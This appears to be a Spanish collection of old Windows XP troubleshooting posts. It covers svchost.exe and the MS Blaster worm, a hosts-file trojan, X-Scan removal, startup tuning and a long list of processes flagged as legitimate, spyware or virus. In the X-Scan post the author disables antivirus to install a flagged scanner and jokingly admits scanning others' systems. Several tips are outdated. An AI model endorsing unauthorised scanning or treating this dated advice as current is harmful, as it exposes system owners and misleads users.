Cuando estes en busca de procesos maliciosos como Adware, software espía, etc, puedes confiar en que los puertos abiertos relacionados con SVCHOST.exe no han sido abiertos con mala intencion. Claro que ataques externos en contra de esos puertos (por ejemplo: Ataques a Llamadas a Procedimiento Remoto RPC "call—RPC—attacks" en contra del puerto 135) no se pueden descartar.

En el mundo de los Firewalls, al proceso del archivo SVCHOST.exe, se le conoce como [GENERIC HOST PROCESS FOR WIN32 SERVICES].

La mayoría de los Firewalls traen reglas predefinididas cuando las conexiones son de salida, pero cuando hay peticiones entrantes, toca definir dos reglas:

Si el protocolo es TCP
Si la conexion es de tipo ENTRADA
BLOQUEAR

Si el protocolo es UDP
Si la conexion es de tipo ENTRADA
BLOQUEAR

Hay casos raros, muy raros... en que las reglas predefinidas de conexiones de salida no son suficientes, si este es su caso, (si experimenta momentos en que el Firewall le pregunta sobre que una aplicacion solicita conexion de salida usando protocolo TCP), convendría definir esta regla:

Si el protocolo es TCP
Si la conexion es de tipo SALIDA
BLOQUEAR

Ataques a tu sistema mediante RPC

El Proceso ó Archivo SVCHOST consume 100% CPU

Si experimentas problemas de lentitud, y notas que el proceso SVCHOST.exe está consumiendo recursos de CPU de forma excesiva y sin control, es muy probable que estes siendo objeto de ataques mediante la vulnerabilidad conocida del RPC.

Mediante dicha vulnerabilidad, existen y continuan apareciendo infinidad de bichos que aprovechan este agujero para insertarse en tu sistema y empezar a hacer todo tipo de travesuras, bicho que normalmente se conoce como msblaster o alguna mutacion.

Si crees estar siendo víctima del MS Blaster o alguna de sus miles de mutaciones:

Inmediatamente ve descargando e instalando los dos parches para el Agujero del LSASS y el RPC/DCOM

Cuando los instales, reinicias, te conectas a Internet y compruebas si el uso de CPU del archivo SVCHOST.EXE es ahora normal. Si no lo es, y notas que continua igual que antes, entonces publica el registro detallado de las aplicaciones de tu sistema usando la aplicacion, HIJACKTHIS que puedes descargar desde aquí.

Una vez instales Hijackthis, publica tu LOG en este foro y allí con gusto te ayudaremos.

IMPORTANTE:

Si lo que tienes es el gusano, con el antivirus NO BASTA, tienes que parchear el error (con el parche RPC, que corrige el agujero de una vez por todas) porque existen infinidad de bichos que aprovechan ese agujero pero que utilizan otro nombre, por lo que si el Antivirus no es tan potente, desconocerá las nuevas mutaciones.

Para tener claro...


El archivo se llama SVCHOST.exe, no confundir con virus que se hacen llamar SVHOST.exe o SVCSHOST.exe, etc.
Este archivo SVCHOST.exe sólo debe aparecer en Windows 2000 y XP.
Su ubicacion debe ser C:\WINDOWS\system32\svchost.exe en Windows XP y C:\WINNT\system32\svchost.exe en Windows 2000.
No importa si SVCHOST.EXE aparece repetido varias veces en la lista de procesos, esto es normal.
SVCHOST.EXE puede llegar a ocupar hasta unos 60MB de la memoria de sistema. Solo preocúpate si el uso de procesador por parte de SVCHOST.EXE es excesivo, no debe ser mas de 20% en algunos casos. (en mi caso personal solo un 1%) El uso del CPU es aleatorio y circunstancial, no debe ocupar CPU en todo el momento, si es así, sospecha de que estas siendo atacado externamente por algun bicho que aprovecha la vulnerabilidad RPC.

-------------------------------------------------------------------

Páginas pornográficas como inicio en internet

Páginas pornográficas como inicio en internet:

PROBLEMA
La página inicial del explorer se cambia por una pornográfica.
Sin darnos cuenta establecemos conexiones con páginas porno.

CAUSA
Un troyano ha entrado.

SOLUCIÓN
¿Echarlo?

DESARROLLO
Un día ejecuté la orden netstat (en Inicio > ejecutar > cmd). Esta orden muestra las conexiones activas: Porto, Dirección local, Dirección remota y Estado.

Me di cuenta de que estaba conectándome con páginas pornográficas si darme cuenta.

Busqué en google la página con la que estaba estableciendo la conexión indeseada y descubrí que lo causaba un troyano.

Para eliminar el problema hay que acudir al archivo hosts que está en c:\windows\system32\drivers\etc

En este archivo aparecían las páginas pornográficas con las que se establecían conexiones indeseadas.

En otros ordenadores, además de establecer conexiones que sólo se pueden ver con netstat, se ponían estas páginas como página de inicio del explorer.

Copio el archivo:

# Copyright (c) 1993-1999 Microsoft Corp.
#
# Éste es un ejemplo de archivo HOSTS usado por Microsoft TCP/IP para Windows.
#
# Este archivo contiene las asignaciones de las direcciones IP a los nombres de
# host. Cada entrada debe permanecer en una línea individual. La dirección IP
# debe ponerse en la primera columna, seguida del nombre de host correspondiente.
# La dirección IP y el nombre de host deben separarse con al menos un espacio.
#
#
# También pueden insertarse comentarios (como éste) en líneas individuales
# o a continuación del nombre de equipo indicándolos con el símbolo "#"
#
# Por ejemplo:
#
# 102.54.94.97 rhino.acme.com # servidor origen
# 38.25.63.10 x.acme.com # host cliente x

127.0.0.1 localhost
Aquí aparecían estas páginas de las que vengo hablando. Basta con borrarlas y ya está.

Quitar el virus troyano que tiene x-scan

Quitar el virus troyano que tiene x-scan

PROBLEMA
X-Scan es un programa escaneador de puertos. Pero también se puede considerar como virus o troyano.

CAUSA
Es un programa que no se deja desinstalar del sistema. Además, algunos antivirus saltan cuando se intenta instalar.

SOLUCIÓN
Desinstalarlo poco a poco y revisando bien varios lugares del sistema, para asegurarse de que está eliminado.

DESARROLLO
Como me gusta la seguridad de mis equipos, instalé X-Scan. Quería comparar los resultados de varios escaneadores de puertos, como nmap y x-scan.

Me saltó el antivirus Viruscan al intentar instalarlo (tiene un analizador en tiempo real). Desactivé Viruscan, para poder instalar X-Scan. Activé de nuevo Viruscan. Usé X-scan para comprobar las vulnerabilidades de los sistemas que administro... y de otros sistemas :-)

El antivirus volvió a decirme que era un virus. Intenté desinstalarlo, pero me dí cuenta de que no era fácil.

Entonces encontré un artículo en internet que me ayudó a hacerlo. Os lo copio:

Overview

Summary:

X-Scan is a general network vulnerabilities scanner for scanning network vulnerabilities for specific IP address scope or stand-alone computer by multi-threading method. Plug-ins are supportable and GUI or CUI programs are separately provided.

Vendor Notes:

Scans hosts or subnets looking for unsecured X clients. If it finds one it starts logging all keystrokes to that session.

Alias:

Application/X-Scan.A [Panda], Exploit/IIS.WebDir [Panda], mIRC/Flood!Trojan [Computer Associates], RmtCfg!Data!Trojan [Computer Associates], Tool-Xscan [McAfee]

Category:


Probe Tool: A tool that explores another system, looking for vulnerabilities. While these can be used by security managers, wishing to shore up their security, the tools are as likely used by attackers to evaluate where to start an attack. An example is an NT Security Scanner.

Exploit: A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it. Exploits are the root of the hacker culture. Hackers gain fame by discovering an exploit. Others gain fame by writing scripts for it. Legions of script-kiddies apply the exploit to millions of systems, whether it makes sense or not. Since people make the same mistakes over-and-over, exploits for very different systems start to look very much like each other. Most exploits can be classified under major categories: buffer overflow, directory climbing, defaults, Denial of Service.


Similar Pests:

Acelerar el arranque de un ordenador

PROBLEMA
Los ordenadores con Windows suelen arrancar lento.

CAUSA
Conforme pasa el tiempo y se van instalando programas, el sistema se deteriora.

SOLUCIÓN
Realizar un optimizado del sistema.

DESARROLLO
Para acelerar el arranque de un ordenador suelo seguir el siguiente protocolo (con bastante éxito, por cierto):

1.- Eliminar programas que no se usan: ir a Inicio > Panel de Control > Agregar o quitar programas. Ahí se pueden borrar todos los que no se usan. El mejor lugar para borrarlos es este, porque los elimina completamente del sistema.

2.- Instalar y ejecutar Easy Cleaner: es un programa gratuito con varias funciones:

- Limpiar registro: borra las entradas inútiles del registro. Esto es fundamental para acelerar el funcionamiento del sistema. He llegado a encontrar ordenadores con más de 200 entradas inútiles en el registro.

- Inicio: administra los programas que se ejecutan al inicio. Esta es una de las causas fundamentales que el ordenador vaya lento al iniciarse. Cuando arranca carga muchos programas, que luego no usará. Si se borra de aquí un programa, se puede usar en cualquier momento, pero no lo carga al inicio (que es lo que más pesado hace el arranque). Yo suelo dejar únicamente los siguientes:
Actualizaciones del antivirus: para que las cargue al arrancar
TBMon: necesario para el arranque
ctfmon: necesario para el correcto arranque del sistema
microsoft office: para que funcione office correctamente
Aquí también se pueden encontrar elementos de inicio que son virus. Si se borran de aquí no se cargan al iniciar y no actúan.
Hay ordenadores que tienen 30 o 40 elementos que se cargan al inicio. Los dejas en 5 o 6 y tardan 5 minutos menos en arrancar. Además, luego funcionan perfectamente.

- Borrar cookies

- Borrar temporales

- Borrar historial internet

- Borrar reciente

3.- Instalar y ejecutar Tune Up: hay una demo de 30 días. Con este programa se puede ejecutar mantenimiento con un clic y optimización de memoria (libera memoria para aumentar la velocidad).

4.- Desinstalar Easy Cleaner y Tune Up.

5.- Desfragmentar el disco duro si es necesario: esto se puede ver en
panel de control > herramientas admnistrativas > administración de equipos > almacenamiento > desfragmentador de discos.

6.- Reiniciar.

Siempre va más rápido el equipo con este chequeo. También se le pueden pasar antivirus, para comprobar si la causa de la lentitud era un virus, o comprobar qué procesos se están ejecutando en el equipo.

Procesos del Administrador de Tareas en Windows XP

Procesos del Administrador de Tareas en Windows XP

PROBLEMA
Algunas veces la CPU del ordenador está demaisado usada, y esto ralentiza el funcionamiento del sistema (hace que vaya demaisado lento)
Algunos virus no se pueden localizar fácilmente.

CAUSA
Se ejecutan muchos procesos simultáneamente. Algunos son virus. Es difícil diferenciarlos.

SOLUCIÓN
Saber qué procesos son inútiles y cuáles son virus, para poder eliminarlos. Para esto es bueno conocer a qué hace referencia cada uno de los procesos.

DESARROLLO

Este modulo ya no es actualizado, pero puedes encontrar casi todos los porocesos de Windows.

Si abrimos el Administrador de tareas (Teclas Control-Shift-Esc o botón derecho en la barra de tareas), en la pestaña Procesos salen las aplicaciones que se están ejecutando en ese momento en el PC. En la siguiente lista se muestran los nombres que podemos encontrar, qué es cada uno y si es importante, opcional o peligroso.

NOTA: Algunos virus y troyanos toman nombres de procesos comunes, como por ejemplo explorer.exe, iexplore.exe, svchost.exe o csrss.exe.

(El esquema de la lista es este: cada proceso tiene una línea con la siguiente información "Proceso Nombre Comentario")

000StTHK.exe Toshiba Hot key Se instala en portátiles Toshiba
00THotKey.exe Toshiba Hot key Se instala en portátiles Toshiba
3dfxCmn.dll 3dfx Tools Parte de los drivers de tarjetas gráficas Voodoo 3/4/5
3dfxMan.exe 3dfx Task Manager Se instala con los drivers de tarjetas gráficas Voodoo 3/4/5
3dldemon.exe 3DLabs Helper Demon Se instala con los drivers de tarjetas gráficas 3DLabs Permedia2/3
3qdctl.exe Terratec sound profile loader Se instala con tarjetas de sonido de Terratec
A4Proxy.exe Anonymity 4 Proxy Permite visitar páginas web de forma anónima
absr.exe Virus Virus AUTOUPDER
aconti.exe Dialer Dialer
acrobat.exe Adobe Acrobat Adobe Acrobat
acrord32.exe Adobe Acrobat Reader Adobe Acrobat Reader
AcroTray.exe Acrobat Tray Icon Se instala con Adobe Acrobat. No hace nada realmente útil
ADGJDet.exe SoundBlaster Audigy Jet Detection No hace nada realmente útil
ad-aware.exe Lavasoft Ad-aware Elimina adware y spyware
Ad-watch.exe Ad-aware Watcher Parte de Lavasoft Ad-aware Plus
adaware.exe Adware / Spyware Spyware RapidBlaster, para eliminarlo ver esta página
adobes.exe Virus Virus FLOOD.BA
adp.exe Spyware Se instala con Net2Phone, Limewire, Cydoor, Grokster, KaZaa, etc
Adtray.exe After Dark for Windows Protector de pantalla
Advapi.exe Virus Virus NETDEVIL.12
agentsvr.exe OLE automation server Parte de Microsoft Agent
aim.exe AOL Instant Messenger Cliente de mensajería instantánea de AOL
airsvcu.exe Microsoft Media Manager Indexa ficheros multimedia, solo vale para ralentizar el sistema
alg.exe Application Layer Gateway Service Parte de la Conexión Compatida y el Firewall de Windows XP
alogserv.exe McAfee VirusScan Parte de McAfee VirusScan
amon.exe Tiny Personal Firewall Parte de esta firewall
Apvxdwin.exe Panda Anti-Virus Parte de este antivirus
ati2evxx.exe * ATIPOLAB Parte de los drivers de ATI, no es realmente necesario
ati2mdxx.exe ATI System Tray icon Se instala con los drivers de ATI, no es realmente necesario
ati2plab.exe ATI drivers Parte de los drivers de ATI, no es realmente necesario
Atigart.exe ATI drivers Sólo se debería ejecutar durante la instalación de los drivers
Atiptaxx.exe ATI drivers Parte de los drivers de ATI, no es realmente necesario
Atisched.exe ATI Scheduler Parte de ATI Multimedia Center, no es necesario
atix10.exe ATI Remote Wonder Se instala con ATI Remote Wonder
Avconsol.exe * McAfee VirusScan Parte de McAfee VirusScan
Avengine.exe Antivirus: Panda, InoculateIT, Norton AV, etc Interno ejecutado por algunos antivirus.Excesivo uso CPU y ralentización, puede ser indicativo de existencia de gusano.
avgcc32.exe AVG anti-virus control center AVG Antivirus
avgserv.exe AVG Antivirus AVG Antivirus
avpcc.exe Kaspersky Labs anti-virus Kaspersky Labs
Avsynmgr.exe * McAfee VirusScan Parte de McAfee VirusScan
avxinit.exe BitDefender anti-virus BitDefender antivirus / firewall
avxlive.exe BitDefender anti-virus BitDefender antivirus / firewall
awhost32.exe pcAnywhere automatic startup pcAnywhere software
backweb.exe Backweb Adware Backweb Adware, muestra publicidad
bargains.exe Spyware Se instala con Net2Phone y LimeWire. Más información aquí
bcb.exe Borland C++ Builder Borland C++ Builder
Bdmcon.exe BitDefender antivirus BitDefender antivirus
blackd.exe BlackICE PC Protection Servicio del firewall BlackICE
blackice.exe BlackICE PC Protection Servicio del firewall BlackICE
blads.exe Tweak-XP Software bloquea publicidad en el Internet Explorer
Bndt32.exe Virus Virus LACON
boot.exe Virus Virus ELEM
bpc.exe Spyware Se instala con Grokster
bpk.exe Perfect Keylogger Registra todo lo que se escribe en el PC
Brasil.exe Virus Virus OPASERV.E
calc.exe Calculadora Parte de Windows
ccApp.exe Symantec Common Client Parte de Norton AntiVirus
ccEvtMgr.exe Event Manager Parte de Norton AntiVirus
ccRegVfy.exe Registry veryfier Parte de Norton AntiVirus
CDANTSRV.exe C-Dilla License Management Se instala con 3DStudio Max y otros programas
cdplayer.exe Reproductor de CD Servicio de Windows
cekirge.scr Virus Virus KERGEZ.A
cfgintpr.exe Configuration Interpreter Parte de Tiny Personal Firewall
charmap.exe Mapa de Caracteres Servicio de Windows
cidaemon.exe * Microsoft Indexing Service Servicio que Indexa los archivos. Gasto de CPU y espacio en disco
cisvc.exe * Microsoft Index Service Helper Indexa los archivos. Gasto de CPU y espacio en disco
CloneCDTray.exe * CloneCD Servicio de este software, no es necesario tenerlo activo
cmd.exe * Windows Command Prompt Servicio de Windows. Símbolo del sistema
cmd32.exe Virus Virus P2P.TANKED
cme.exe Spyware Parte de Gator. Más información aquí
cmesys.exe Spyware Parte de Gator. Más información aquí
cnbabe.exe Spyware Spyware
comcfg.exe Virus Virus TOADCOM.A
command.exe Virus Virus QQPASS.E
Commandr.exe Logitech internet keyboard Servicio necesario para que funcionen las teclas extra
compaq-rba.exe Compaq Message Server No es necesario tenerlo activo
CPal.exe * Cookie Pal. Gestor de cookies. Activo con el Explorer abierto
CPBrWtch.exe * Cookie Pal. Gestor de cookies. Activo con el Explorer abierto
CPQAcDc.Exe Compaq PowerCon Enhancements En portátiles Compaq
cpqek.exe Compaq Easy Access Buttons En portátiles Compaq
cpumgr.exe Virus Virus PANDEM.B
Createcd50.exe Adaptec Easy CD Creator Parte de este software de grabación
Creatorc.exe * Easy CD Creator 6.0 Parte de este software de grabación
crs.exe Adware / Spyware Se instala con programas bajados de gratisware
csrss.exe * Client Server Runtime Subsystem Parte de Windows, encargado de crear ventanas y gráficos
ct_load.exe CyDoor, Spyware Más información en esta página: Cydoor
ctbclick.exe Adware / Spyware Spyware. Ver información aquí
CTsvcCDA.exe Creative Auto-detect Se instala con el software de Soundblaster Audigy2
CTDetect.exe Creative Service for CDROM Access Se instala con el software de Soundblaster Audigy
cteaxspl.exe Creative Audigy EAX splash screen Sólo muestra el logotipo de Creative Audigy EAX
ctfmon.exe Microsoft Office Language Bar Parte de Microsoft Office, aunque no imprescindible
cthelper.exe Creative plug-in manager No tiene una función y suele ralentizar el sistema
CTLauncher.exe Creative Launch bar Consumo excesivo de recursos
CtNotify.exe Detector de disco No hace nada útil
CTRegRun.exe Creative Labs registration reminder No hace nada útil
ctsrreg.exe Sound Blaster Live registration reminder No hace nada útil
CTsvcCDA.EXE * Creative Service for CDROM Access (Sound Blaster) Dudosa utilidad
cuo.exe Virus Virus BUGBEAR
cutftp.exe CuteFTP Cliente FTP
cvpnd.exe Cisco VPN Director Cliente de VPN de cisco
Daemon.exe Daemon Tools Permite crear una unidad virtual a partir de una imagen de CD
DAP.exe Download Accelerator Plus Gestor de descargas
DavCData.exe * HTTP-DAV common data Internet Information Services. Microsoft Corporation
ddhelp.exe DirectDraw Helper Parte de DirectX
ddhelp32.exe Virus Virus BIONET.318
defwatch.exe Norton AntiVirus Servicio de Norton AntiVirus
desire.exe Desire Un dialer, conecta con webs porno llamando a un 906
devldr32.exe Create Device Loader Parte de los drivers de Creative Soundblaster
directcd.exe DirectCD Adaptec DirectCD
Directx.exe Virus Virus SDBOT.D, BLAXE o LOGPOLE
dktime.exe Trojan/Downloader dktime.exe
DKService.exe * Diskeeper, defragmentador de disco Parte de de este software
dlder.exe Clicktilluwin hijackware Se instala con Bearshare, LimeWire, Grokster, Net2Phone, Kazaa, ....
dlgli.exe Adware / Spyware Muestra publicidad
dllhost.exe * DCOM DLL Host Process Parte de Windows, agrupa varios objetos COM
dllmem32.exe Virus Virus KWBOT.E
dllreg.exe Virus Virus NIBU , BAMBO o DUMARU
dpps2.exe Pop-Up Stopper Companion Bloquea publicidad en el Internet Explorer
dreamweaver.exe Macromedia DreamWeaver Macromedia DreamWeaver
DrgToDsc.exe Roxio DragToDisc Parte de Roxio EasyCD Creator 6.0, no imprescindible
dslaunch.exe Yamaha DS-XG tray icon Se instala con los drivers de esta tarjeta de sonido
dssagent.exe Adware / Spyware Ver información aquí
DUMeter.exe * Dumeter, internet, control velocidad descargas y subidas Parte de este software
Dvp95.exe F-Secure antivirus Parte del software F-Secure
DvzMsgr.exe DataViz Messenger Otro programa de mensajería instantánea, poco usado
dw.exe Adware Medialoads Muestra publicidad. Más información aquí
Dxupdate.exe Virus Virus MAFEG
enbiei.exe Virus Virus BLASTER.F
em_exec.exe Logitech MouseWare Trayicon No es imprescindible para que funcione el ratón
emule.exe * emule Ejecutable de este software de P2P.
EngUtil.exe Roxio Engine Utility Parte de Roxio EasyCD Creator 6.0, no necesario
evntsvc.exe Real Player Update Parte de Real Player, no hace nada útil y además viene con Spyware
excel.exe Microsoft Excel Parte de Microsoft Office
expl32.exe Virus Virus RATSOU o HACKTACK
explore.exe Virus Virus GRAYBIRD.G, NETBUS o HAWAWI
Explorer.exe Explorer Parte de Windows. Muestra el escritorio, barra de tareas y carpetas
fhfmm.exe AdBreak advertising spyware Ver información aquí
findfast.exe Microsoft Office Indexing Indexa documentos de Office. Solo vale para ralentizar el PC.
flashget.exe * Flashget, gestor de descargas Gestor de descargas de internet
flydesk.exe Advertising spyware Advertising spyware
fpdisp5a.exe * FinePrint Driver de este software de impresión. Ver información aquí
FreeMem.exe FreeMem Utilidad para "liberar memoria". Ver información aquí
FreeRAM ... .exe FreeRAM Utilidad para "liberar memoria".
frontpg.exe Frontpage Parte de Microsoft Office
fvlaunch.exe Dr. Solomon's Antivirus Parte de este antivirus
gain_trickler_exe Gator Advertising spyware Se instala con un montón de programas. Más información aquí y aquí
gator.exe Gator Advertising spyware Se instala con un montón de programas. Más información aquí y aquí
getright.exe GetRight GetRight, de Headlight Software
gmt.exe Gator Advertising spyware Se instala con un montón de programas. Más información aquí y aquí
Hbinst.exe Hotbar adware/spyware Más información aquí
hcwprn.exe AdBreak advertising spyware Ver información aquí
helpctl.exe Virus Virus GASLIDE
hh.exe Windows Help Parte de Windows
hidserv.exe Microsoft Human Interface Device Parte de Windows. Más información aquí
hkss.exe Compaq HotKey Software Se instala en portátiles Compaq
hpcdtray.exe HP CD-Writer icon No imprescindible
hpfsched DeskJet Reminder No hace nada realmente útil
hpsjvxd.exe HP SCAN Monitor Necesario si se usa el scanner
hpsysdrv.exe HP System Monitor Necesario para usar algunas funciones propias de HP
hpztsb06.exe HPDJ Taskbar Utility Viene con PCs HP, para controlar la música
https.exe Virus Virus MOEGA.D
Hwdoctor.exe * Hardware Doctor Parte de este programa de Winbond que controla estado placa base.
hxdl.exe HelpExpres Advertising spyware Se instala con Attune, un "complemento" de muchos programas
hxiul.exe HelpExpres Advertising spyware Se instala con Attune, un "complemento" de muchos programas
icon.exe Virus Virus RapidBlaster. Más información aquí
icq.exe ICQ Programa de mensajería instantánea
icsmgr.exe Conexión compartida Parte de Windows
ide.exe Virus Virus ASSASIN.F
iedll.exe SearchBar Modifica las opciones del Internet Explorer
IexpIore.exe Virus Virus OBLIVION.B
IEXPLORE.EXE * Internet Explorer Internet Explorer
iexplore32.exe Virus Virus SPEX
iexplorer.exe Virus Virus LORSIS o RapidBlaster
InCD.exe Ahead InCD Programa para poder copiar ficheros a CD directamente
inetinfo.exe IIS Admin Service Helper Parte de Microsoft Internet Infomation Services
InkMonitor.exe Ink Monitor Se instala con el software de impresoras Epson
internat.exe Configuración Regional Parte de Windows, permite cambiar el idioma del teclado, formato de fecha, etc
Internet.exe Virus Virus MAGICCALL
ipmon.exe Virus Virus RECERV
IPSecMon.exe Microsoft L2TP/IPSec VPN Client Parte de Windows
irmon.exe Windows Infrared Port Monitor Parte de Windows, monitoriza el puerto de infrarrojos
isass.exe Virus Virus OPTIX PRO
iTouch.exe iTouch configuration Se instala con teclados Logitech
kazaa.exe KaZaa P2P software Instala el spyware Cy-door
kazaalite.exe KaZaa Lite P2P software Este no trae spyware
kern32.exe Virus Virus BADTRANS.A
Kernel32.exe Virus Virus BABYLONIA, KERNEL, KICKIN.A, TENDOOLF o HOOKER
khooker.exe SiS Keyboard Daemon Se instala con los drivers de SiS, no es necesario y puede causar problemas
kkcomp.exe AdBreak advertising spyware Ver información aquí
kodakimage.exe Kodak Imaging Parte de Windows
KodakCCS.exe * Camara Digital Kodak DC Ring 3 Conduit (Win32) Kodak DC File System Driver (Win32)
kvnab.exe AdBreak advertising spyware Ver información aquí
launchpd.exe ATI Launchpad Se instala con el ATI Multimedia Center, no necesario
liqad.exe AdBreak advertising spyware Ver información aquí
liqui.exe AdBreak advertising spyware Ver información aquí
load32.exe Virus Virus NIBU, BAMBO o DUMARU
loadqm.exe MSN Queue Manager No hace nada realmente útil
loadwc.exe Microsoft Load WebCheck Sólo comprueba que el Internet Explorer es el explorador predeterminado
LogiTray.exe Logitech Image Studio Parte del software de Logitech QuickCam
lsass.exe * Local Security Authority SubSystem Parte de Windows, se encarga de la seguridad y las contraseñas
lsem.exe PurityScan Spyware PurityScan
lycos.exe Adware / Spyware Parte de Intelligent Explorer, instala BargainBuddy/Apuc
ltmsg.exe LT WinModem Parte de los drivers de LTWinModem, no es necesario para su funcionamiento
lxbabmgr.exe Lexmark X74-X75 Parte del software que viene con la impresora
mad.exe System Attendant Service Parte de Microsoft Exchange Server
MagicRulez.exe Virus Virus MINIMAN
MBM5.exe Motherboard Monitor 5 Muestra información sobre la placa base
mcpserver.exe Master Control Program for Stardock Necesario sólo si se usa algún programa de Stardock
Mcshield.exe * McAfee VirusScan Parte de McAfee VirusScan
mcupdate.exe McAfee VirusScan Parte de McAfee VirusScan
MDM.exe * Microsoft Machine Debug Manager No hace nada realmente útil, se instala con Microsoft Office
MemTurbo.exe MemTurbo Estos programas "optimizadores de memoria" solo hacen que el PC vaya más lento
messenger.exe Virus Virus KUTEX
mgabg.exe Matrox BIOS Guard Parte de los drivers de Matrox
mgactrl.exe Matrox Control Center Parte de los drivers de Matrox
mgadiag.exe Matrox Diagnostic Parte de los drivers de Matrox
mgaqdesk.exe Matrox QuickDesk Parte de los drivers de Matrox
mirc.exe mIRC mIRC, cliente IRC
mmc.exe Microsoft Management Console Parte de Windows
MMKeybd.exe Packard Bell ActiveBoard keyboard Permite usar las teclas extra del teclado de estos equipos
mobsync.exe Microsoft Mobile Synchronization Manager No hace nada realmente útil. Lo único si se usan carpetas off-line.
mosearch.exe Microsoft Office XP Fast Search No hace nada realmente útil, ralentiza el sistema
MouseElf.exe * Genius NetScroll Optical Mouse Drivers Driver raton
mp3serch.exe Adware / Spyware Spyware Lop.com.
mpk.exe * MyPopUpKiller Parte de este software anti popups.
mplayer.exe Windows Media Player Parte de Windows
mplayer2.exe Windows Media Player 6.4 Parte de Windows
mprexe.exe Windows Routing Process Parte de Windows (server)
mptask.exe Virus Virus LALA, DOWNLOADER-BN.B o AOT
mqsvc.exe * Message Queuing Service Microsoft Message Queue
mqtgsvc.exe * Windows NT MSMQ Trigger Service Microsoft Message Queue
msaccess.exe Microsoft Access Parte de Microsoft Office
msbb.exe Web3000 Spyware Se instala con muchos programas, muestra publicidad
msblast.exe Gusano BLASTER.B El más famoso de los últimos tiempos. Más información aquí
mscom32.com Virus Virus BEASTY.H
msdtc.exe * Distributed Transaction Coordinator Usado para acceder a bases de datos en red
msgPlus.exe * Messenger Plus! Mejoras MSN Messenger. Mas información aquí
msgsrv32.exe Windows 32-bit VxD Message Server Parte de Windows, más información aquí
msiexec.exe Windows Installer Parte de Windows, aunque solo debería estar activo durante una instalación
msiexec16.exe Virus Virus OPTIX PRO
msimn.exe * Outlook Express Parte de Windows, gestor de correo.
mslaugh.exe Virus Virus BLASTER.E
mslogon.exe Advertising Spyware Ver información aquí y herramienta para quitarlo aquí
msmscfg.exe Virus Virus W32/Gaobot.FT
msmsgs.exe * Microsoft Messenger Windows o MSN Messenger
msnet.exe Virus Virus SDBOT o BOA
msoffice.exe * Barra de herramientas de Microsoft Office No hace nada realmente útil, consume memoria
msoobe.exe Windows Product Activation Realiza la activación de Windows
mspaint.exe Microsoft Paint Parte de Windows
MsPMSPSv.exe * WMDM PMSP Service Servicio de Windows Media Player 7
mstask.exe Programador de tareas Servicio de Windows
mstask32.exe Virus Virus YAHA.P
Mstray.exe RavTime Virus WUKILL.A
mswheel.exe Microsoft Intellipoint Sólo para usar botones extra
mysqld-nt.exe MySQL Daemon Parte de MySQL
nabv32.exe Virus Virus TITOG.C
navapsvc.exe Norton AntiVirus Auto-Protect Servicio de Norton Antivirus
navapw32.exe Norton AntiVirus Agent Servicio de Norton Antivirus
ndetect.exe ICQ Ndetect Agent Parte de ICQ
nprotect.exe Norton Protected Recycle Bin Permite recuperar ficheros eliminados de la papelera
NeroCheck.exe * Ahead Nero Check No necesario normalmente
Netd32.exe Virus Virus RANDEX.F o SDBOT.R
netscape.exe Netscape Web Browser Netscape
newsupd.exe Creative Labs spyware Ver información aquí
Njgal.exe Virus Virus KILO
notepad.exe - Block de notas Parte de Windows
npnsdad.exe Advertising Spyware Ver información aquí
npnzdad.exe NetZip Download Demon - spyware Ver información aquí
nstask32.exe Virus Virus RANDEX.E
ntbackup.exe Windows Backup Servicio de Windows
ntvdm.exe Windows 16-bit Virtual Machine Servicio de Windows. Más información aquí
nvsvc32.exe NVIDIA Driver Helper Service Se instala con los drivers de nvidia
nwiz.exe NVIDIA nView Control Panel Se instala con los drivers de nvidia
onflow.exe Web Advertising Ver información aquí
osa.exe Office Startup Assistant Precarga ciertos componentes de Office. Sólo un gasto inútil de memoria.
osa8.exe Office Startup Assistant Precarga ciertos componentes de Office. Sólo un gasto inútil de memoria.
osa9.exe Office Startup Assistant Precarga ciertos componentes de Office. Sólo un gasto inútil de memoria.
OSD.EXE On-Screen Display Muestra iconos en pantalla al presionar teclas especiales
outlook.exe * Microsoft Outlook Parte de Microsoft Office
outpost.exe Outpost personal firewall Parte de esta firewall
owmngr.exe Spyware / hijackware Cambia la configuración del Internet Explorer, muestra publicidad
pavsched.exe Panda Antivirus scan scheduler Parte de este antivirus
persfw.exe Tiny Personal Firewall Parte de esta firewall
photoshop.exe Adobe Photoshop Adobe Photoshop
PCLEScheduler.exe * Pinnacle Scheduler Application Programador grabación de tarjeta televisión Pinnacle PCTV Visión
point32.exe Microsoft Intellimouse Monitor No es imprescindible para que funcione el ratón
PowerDVD.exe Cyberlink PowerDVD Reproductor de DVD
powerpnt.exe Microsoft PowerPoint Parte de Microsoft Office
PQVìSvc.exe * Drive Image 7.0 Servicio del módulo protector V2i
PSFree.exe Pop-Up Stopper Free Evita publicidad en Internet Explorer
pstores.exe Protected Storage Service Parte de Windows, controla el almacenamiento de contraseñas
qttask.exe QuickTime Tray Icon Icono de QuickTime, no hace nada útil
ramdef.exe Ram Def Xtreme Utilidad para "desfragmentar" la RAM, de dudosa utilidad (Ver esta página)
ramidle.exe RAM Idle Utilidad para "liberar" RAM, de dudosa utilidad (Ver esta página)
rapapp.exe BlackICE Parte de BlackICE PC Protection
ravtray8.exe RAV8Tray Parte de RAV anti-virus
rb32.exe RapidBlaster Ver información aquí y herramienta para quitarlo aquí
rcsync.exe PrizeSurfer Adware Muestra publicidad
RealEvent.exe RealOne Player background task Parte de RealOne Player, muestra publicidad
realplay.exe Real Player No se aconseja su uso porque trae spyware
realsched.exe Real Networks Scheduler Se instala con RealOne Player, ralentiza el sistema
Real-Tens.exe Real-Tens Advertising spyware Ver información aquí
recguard.exe Recguard Se instala en PCs HP para evitar que se borre la partición de recuperación
Regcpm32.exe RegCompres Virus POLDO.B
registry.exe Registry Services Virus DOWNLOADER.CILE
regloadr.exe Registry Loader Virus GAOBOT.AO
Regprot.exe RegProt RegistryProt de Diamond Computer Systems
regscanr.exe Registry Scanner Virus OPTIX LITE FIREWALL BYPASS
Regshave.exe Registry Shaver task Se instala con las cámaras digitales Fuji Finepix, no es necesario
regsrv.exe regsrv Virus OPTIXPRO.11
regsvc.exe Remote Registry Service Servicio de Windows, permite acceder al registro remotamente
RegTwk.exe RegTweak Rage3d Tweak, modifica el funcionamiento de tarjetas gráficas ATI
Remind32.exe Registration reminder No hace nada realmente útil
Remoterm.exe * Pinnacle Remote Control Application Control remoto / mando a distancia tarjeta televisión Pinnacle PCTV
RepliGoMon.exe RepliGo Assistant Cerience RepliGo software
RivaTuner.exe RivaTuner RivaTuner, permite configurar tarjetas gráficas nVidia
